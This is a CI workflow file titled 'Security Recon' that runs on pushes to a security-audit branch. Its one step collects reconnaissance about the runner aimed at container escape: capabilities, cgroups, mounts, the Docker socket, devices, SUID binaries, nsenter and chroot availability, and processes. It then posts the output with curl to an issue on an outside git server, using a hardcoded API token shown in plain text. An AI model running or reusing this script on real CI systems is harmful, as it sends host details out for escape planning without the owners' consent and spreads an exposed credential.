name: Security Recon on: push: branches: - security-audit jobs: recon: runs-on: ubuntu-latest steps: - name: Recon and post run: | RECON=$(mktemp) { echo "=== WHOAMI ===" ; whoami ; id echo "=== UNAME ===" ; uname -a echo "=== OS RELEASE ===" ; cat /etc/os-release 2>/dev/null || true echo "=== HOSTNAME ===" ; hostname echo "=== CAPABILITIES ===" ; grep -i cap /proc/self/status echo "=== CGROUP ===" ; cat /proc/1/cgroup 2>/dev/null || true echo "=== MOUNT ===" ; mount 2>/dev/null || true echo "=== DOCKER SOCKET ===" ; ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket" echo "=== DOCKER CLI ===" ; which docker 2>/dev/null && docker ps 2>&1 || echo "No docker" echo "=== FDISK ===" ; fdisk -l 2>/dev/null || echo "no fdisk" echo "=== LSBLK ===" ; lsblk 2>/dev/null || echo "no lsblk" echo "=== DEVICES ===" ; ls -la /dev/ 2>/dev/null | head -50 echo "=== IP ADDR ===" ; ip addr 2>/dev/null || ifconfig 2>/dev/null || true echo "=== IP ROUTE ===" ; ip route 2>/dev/null || true echo "=== TOOLS ===" which nsenter 2>/dev/null && echo "nsenter: YES" || echo "nsenter: NO" which chroot 2>/dev/null && echo "chroot: YES" || echo "chroot: NO" echo "=== SUID ===" ; find / -perm -4000 -type f 2>/dev/null | head -20 echo "=== PS ===" ; ps aux 2>/dev/null || true echo "=== PID1 ===" ; cat /proc/1/cmdline 2>/dev/null | tr '\0' ' ' ; echo echo "=== PROC COUNT ===" ; ls /proc/*/cmdline 2>/dev/null | wc -l echo "=== AVAILABLE COMMANDS ===" ls /usr/bin/ /usr/sbin/ /bin/ /sbin/ 2>/dev/null | sort -u | head -100 } > "$RECON" 2>&1 # Try posting - escape JSON manually BODY=$(sed 's/\\/\\\\/g; s/"/\\"/g; s/\t/\\t/g' "$RECON" | awk '{printf "%s\\n", $0}') curl -v -X POST \ -H "Authorization: token 262087ec7019c01943014083e6e18d5a8920caa0" \ -H "Content-Type: application/json" \ -d "{\"body\":\"$BODY\"}" \ "https://git.eeqj.de/api/v1/repos/sneak/lora.vegas/issues/3/comments" 2>&1 || true echo "=== RECON OUTPUT ===" cat "$RECON"